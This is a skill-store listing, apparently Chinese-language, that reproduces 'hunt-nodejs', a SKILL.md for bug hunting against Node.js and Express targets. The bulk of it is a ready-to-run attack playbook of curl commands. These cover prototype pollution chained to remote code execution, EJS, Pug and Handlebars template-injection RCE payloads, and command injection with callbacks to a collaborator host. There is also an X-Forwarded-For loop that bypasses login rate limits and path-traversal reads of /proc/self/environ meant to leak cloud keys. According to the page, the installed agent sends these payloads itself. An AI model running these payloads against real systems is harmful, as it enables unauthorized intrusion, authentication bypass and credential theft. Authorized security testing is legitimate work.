‹ 首页

hunt-nodejs

@elementalsouls · 收录于 1 周前 · 上游提交 2 周前

Hunt Node.js specific vulnerabilities — Prototype Pollution → RCE chains (lodash/merge/assign), Express trust proxy misconfiguration, child_process/eval injection, template engine SSTI (EJS/Pug/Handlebars), path traversal in file servers, require() injection, environment variable exfil via /proc/self/environ. Use when target runs Node.js/Express/Fastify/NestJS/Koa.

适合你,如果你需要针对 Node.js 服务进行漏洞挖掘与利用链构建

/ 下载安装
hunt-nodejs.skill双击,或拖进 Claude 桌面版 / Cowork,即完成安装↓ .skill↓ .zip
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
Claude Code~/.claude/skills/(项目级 .claude/skills/)
Codex CLI~/.codex/skills/
Cursor自动读取上面两处目录
其他工具见其文档的「skills」目录;两个下载是同一份文件,只是名字不同
/ 通过 npx 安装 校验哈希
npx oh-my-skill add elementalsouls/claude-bughunter/hunt-nodejs
/ 通过 bash 安装
curl -fsSL https://oh-my-skill.com/install.sh | bash -s -- elementalsouls/claude-bughunter/hunt-nodejs
/ 已经装过?验证本机副本,不用重装
npx oh-my-skill verify elementalsouls/claude-bughunter/hunt-nodejs
安装目标可用 --agent / --scope 或 --to 明确指定;省略时只会在唯一已存在的 agent 目录上自动选择,零命中或多命中会停止并提示。content_hash 缺失或不一致均拒装。
2927GitHub stars
~1.8K上下文体积 · 单文件
镜像托管

怎么用

商店整理自技能原文 · 版本 05098fc · 表述以原文为准
它做什么

装上后,Claude 会专门检查 Node.js 应用的安全漏洞,包括原型污染、命令注入、模板引擎注入等,并给出具体的测试命令。

什么时候触发

当目标运行 Node.js、Express、Fastify、NestJS 或 Koa 时触发。

装好后可以这样说
Claude 会执行原型污染检测步骤。
Claude 会尝试注入命令并观察响应。
Claude 会发送 SSTI 测试 payload。
技能原文 SKILL.md作者撰写 · MIT · 05098fc

HUNT-NODEJS — Node.js Specific Vulnerabilities

Crown Jewel Targets

Prototype Pollution reaching a sink in Node.js backend = Critical RCE.

Highest-value chains:

  • Prototype Pollution → RCE__proto__ injection via lodash.merge / Object.assign → polluted prototype reaches child_process.exec or vm.runInNewContext sink
  • Express trust proxyapp.set('trust proxy', true) without validation → attacker sets X-Forwarded-For to bypass IP allowlists or rate limits
  • EJS/Pug SSTI — template engine receives user input → {{= process.mainModule.require('child_process').execSync('id') }}
  • child_process injection — user input interpolated into shell command string → OS command injection
  • require() path traversal — attacker-controlled module path → load arbitrary file as JS

Attack Surface Signals
X-Powered-By: Express           Confirms Express.js
Node.js in error messages        Runtime detected
package.json exposed             Dependency list + versions
/proc/self/environ accessible    Environment variable exfil
Error stack traces with .js paths  Node.js confirmed
__proto__ in JSON accepted        Prototype pollution candidate

Phase 1 — Fingerprint
# Confirm Node.js/Express
curl -sI https://$TARGET/ | grep -i "x-powered-by\|nodejs\|express"

# Check for package.json / node_modules exposure
curl -s "https://$TARGET/package.json"
curl -s "https://$TARGET/package-lock.json"
curl -s "https://$TARGET/node_modules/.package-lock.json"

# Error-based version detection
curl -s "https://$TARGET/nonexistent-path-xyz" | grep -i "node\|express\|cannot GET"

Phase 2 — Prototype Pollution Detection
# JSON body injection — test if __proto__ is accepted
curl -s -X POST https://$TARGET/api/merge \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"polluted": "yes"}}'

# Constructor prototype
curl -s -X POST https://$TARGET/api/settings \
  -H "Content-Type: application/json" \
  -d '{"constructor": {"prototype": {"isAdmin": true}}}'

# URL query param injection (qs library)
curl -s "https://$TARGET/api/search?__proto__[polluted]=yes&query=test"
curl -s "https://$TARGET/api/data?constructor[prototype][admin]=1"

# Confirm pollution: does a subsequent request reflect the polluted key?
curl -s "https://$TARGET/api/me" | grep -i "polluted\|isAdmin\|admin"

Phase 3 — Prototype Pollution → RCE Chain
# If pollution is confirmed, attempt to reach dangerous sinks

# Sink 1: child_process via options.shell pollution
curl -s -X POST https://$TARGET/api/update \
  -H "Content-Type: application/json" \
  -d '{
    "__proto__": {
      "shell": "node",
      "NODE_OPTIONS": "--require /proc/self/fd/0",
      "env": {"NODE_OPTIONS": "--inspect=COLLAB_HOST"}
    }
  }'

# Sink 2: lodash template pollution (CVE-2021-23337)
curl -s -X POST https://$TARGET/api/render \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"sourceURL": "\nreturn process.mainModule.require(\"child_process\").execSync(\"id\").toString()//"}}'

# Sink 3: ejs template options pollution
# If EJS is used for rendering, pollute the `opts.escapeXML` or `opts.outputFunctionName`
curl -s -X POST https://$TARGET/api/template \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"outputFunctionName": "x;process.mainModule.require(\"child_process\").execSync(\"curl COLLAB_HOST/pp-rce\");x"}}'

# OOB confirmation — check Interactsh for callback

Phase 4 — Express Trust Proxy Abuse
# If Express has trust proxy enabled, X-Forwarded-For is trusted
# Test: does spoofed IP bypass IP-based rate limiting or allowlist?

# Spoof IP to 127.0.0.1 (localhost bypass)
curl -s -X POST https://$TARGET/api/admin/action \
  -H "X-Forwarded-For: 127.0.0.1" \
  -H "Content-Type: application/json" \
  -d '{"action": "test"}'

# Spoof to internal IP range
curl -s -X POST https://$TARGET/api/internal \
  -H "X-Forwarded-For: 10.0.0.1" \
  -H "X-Real-IP: 10.0.0.1"

# Rate limit bypass via rotating fake IPs
for i in $(seq 1 50); do
  curl -s https://$TARGET/api/login \
    -H "X-Forwarded-For: 1.2.3.$i" \
    -d '{"email":"admin@test.com","password":"wrong"}' \
    -o /dev/null -w "$i: %{http_code}\n"
done

Phase 5 — Template Engine SSTI (EJS / Pug / Handlebars)
# EJS SSTI — if user input reaches EJS template context
# Test basic: <%= 7*7 %> should return 49
curl -s -X POST https://$TARGET/api/render \
  -H "Content-Type: application/json" \
  -d '{"template": "<%= 7*7 %>"}'

# EJS RCE payload
curl -s -X POST https://$TARGET/api/render \
  -H "Content-Type: application/json" \
  -d '{"template": "<%= process.mainModule.require(\"child_process\").execSync(\"id\").toString() %>"}'

# Pug SSTI
curl -s -X POST https://$TARGET/api/render \
  -H "Content-Type: application/json" \
  -d '{"template": "- var x = root.process\n= x.mainModule.require(\"child_process\").execSync(\"id\")"}'

# Handlebars — prototype pollution via template
curl -s -X POST https://$TARGET/api/render \
  -H "Content-Type: application/json" \
  -d '{"template": "{{#with \"s\" as |string|}}{{#with \"e\"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub \"constructor\")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push \"return process.mainModule.require(childprocess).execSync(id)\"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}"}'

Phase 6 — child_process Command Injection
# Look for endpoints that run shell commands with user input
# Signals: /api/convert, /api/exec, /api/ping, /api/scan

# Basic injection test
curl -s "https://$TARGET/api/ping?host=127.0.0.1;id"
curl -s "https://$TARGET/api/convert?file=test.pdf;curl+COLLAB_HOST/ci"
curl -s -X POST https://$TARGET/api/exec \
  -H "Content-Type: application/json" \
  -d '{"command": "ls", "args": ["&&", "curl", "COLLAB_HOST/ci"]}'

# OOB via DNS
curl -s "https://$TARGET/api/dns?host=\$(curl+COLLAB_HOST/dns-ci).example.com"

Phase 7 — /proc/self/environ Exfil
# If LFI exists on Node.js app, /proc/self/environ leaks env vars
curl -s "https://$TARGET/api/file?path=/proc/self/environ"
curl -s "https://$TARGET/api/read?file=../../../../proc/self/environ"

# Also check:
curl -s "https://$TARGET/api/file?path=/proc/self/cmdline"  # full command line
curl -s "https://$TARGET/api/file?path=/proc/self/cwd"       # working directory

Chain Table

| Node.js finding | Chain to | Impact | |----------------|----------|--------| | Prototype pollution confirmed | Find RCE sink (child_process, eval) | Critical RCE | | Express trust proxy | Bypass IP allowlist / rate limit | Auth bypass / DoS bypass | | SSTI in template engine | OS command execution | Critical RCE | | child_process injection | id && curl COLLAB_HOST | Critical RCE | | /proc/self/environ via LFI | AWS_ACCESS_KEY_ID leaked | Cloud compromise |


Validation

✅ Prototype pollution: key appears in subsequent API responses without being sent ✅ RCE chain: OOB callback received OR id output in response ✅ Trust proxy: spoofed IP accepted, bypasses rate limit or allowlist

Severity:

  • Prototype pollution → RCE: Critical
  • SSTI → RCE: Critical
  • child_process injection: Critical
  • Trust proxy → rate limit bypass: Medium
  • /proc/self/environ exfil: High (if cloud keys present)
按 MIT 许可原样转载,未经改动 · 在 GitHub 查看 →

评论

登录即可评论;带「已验证安装」的,是发布者名下有本店的安装或持有记录。